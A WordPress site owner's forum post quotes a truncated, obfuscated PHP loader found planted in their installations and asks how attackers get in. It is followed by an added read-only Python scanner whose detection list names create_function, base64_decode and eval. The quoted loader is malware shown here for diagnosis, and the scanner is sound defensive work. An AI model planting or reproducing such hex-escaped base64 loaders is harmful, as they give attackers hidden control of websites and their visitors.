Around November time I had 11 or so sites hacked, and whenever you clicked on them in Google you were redirected elsewhere. I took all the sites down and started from scratch.
I've just logged into my hosting through FileZilla and noticed a number of bizarre file names:
There is one of these weird filenames in each of my WordPress installations and they are outside the content, admin and includes folders. I've just scanned my site for malware and it came back OK, so I'm not sure what they are.
I opened them up and the content looks something like this:
<?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7MjAyOzIwODsyMDI7MjIxOzIyMTsxOTI7MjIxOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjE2OzIwNjsyMjE7MTkzOzE5ODsxOTM7MjAwOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjIzOzIwNjsyMjE7MjIwOzIwMjsxNjY7MTgwOzEzMDsxMzM7MjMwOzIyNTsyMzA7MjA4OzI1MjsyMzQ7MjUxOzE2NzsxNjg7MjM1 .............. but a lot longer...........);?>
I even have an HTML site with one of these PHP files in it so I'm 99.9% sure it's an attempt at hacking.
Since getting hacked last time I changed my passwords, and have since used WP Secure and Security Scan. My table prefixes are different and I've also uploaded htaccess files to the wp-admin folders.
Plus I make sure all my sites are up to date with the latest version of WordPress.
The sites seem to be performing OK and the malware scan came back negative, so I'm thinking someone may have unsuccessfully tried to hack my sites (again). I want to delete these files.
Has anyone any idea how someone might be accessing my sites? Is it through my hosting account or my FTP software? I even improved the security on my machine to scan for malware...
I'd like to tighten this up further because I don't want these rogue PHP files on my sites at all.
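
A read-only scanner for the pattern in the file quoted above, as an added example that is not part of the original post: it flags PHP files that hide names such as create_function and base64_decode behind \x escapes, call them through a variable, and carry a long base64 literal. The name list, the length thresholds and SAMPLE (the head of the quoted file with a harmless filler in place of the payload) are assumptions constructed for illustration.

```python
import os
import re
import sys

# Function names that have no reason to be spelled out in \xNN escapes (assumed list).
SUSPECT_NAMES = {"create_function", "base64_decode", "eval", "assert", "gzinflate"}
HEX_STRING = re.compile(r'"((?:\\x[0-9a-fA-F]{2}){4,})"')
VAR_CALL = re.compile(r'\$\w+\s*\(')          # $var( ... ): call through a variable
LONG_B64 = re.compile(r'["\'][A-Za-z0-9+/=]{200,}')
# Constructed sample: same shape as the quoted file, filler base64 ("ABC" repeated).
SAMPLE = (r'<?php $_a="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";'
          r'$_b="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_c=$_a("",$_b("'
          + "QUJD" * 60 + '"));?>')

def decode_hex_escapes(literal):
    """Turn the body of a PHP "\\x63\\x72..." literal into the text it spells."""
    return bytes.fromhex(literal.replace("\\x", "")).decode("latin-1")

def scan_php_source(text):
    """Return the reasons (possibly none) a PHP source string looks obfuscated."""
    findings = []
    for match in HEX_STRING.finditer(text):
        name = decode_hex_escapes(match.group(1))
        if name.lower() in SUSPECT_NAMES:
            findings.append("hex-escaped function name: " + name)
    if findings and VAR_CALL.search(text):
        findings.append("call through a variable")
    if LONG_B64.search(text):
        findings.append("long base64 literal")
    return findings

def scan_tree(root):
    """Map each .php file under root to its findings; files are only read."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, "r", encoding="latin-1") as handle:
                    found = scan_php_source(handle.read())
                if found:
                    hits[path] = found
    return hits

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, found in sorted(scan_tree(root).items()):
        print(path, "->", "; ".join(found))
```

Run it against a downloaded copy of the web root; a hit on a file that is not part of WordPress core, a theme or a plugin is a candidate for removal after comparing against a clean install.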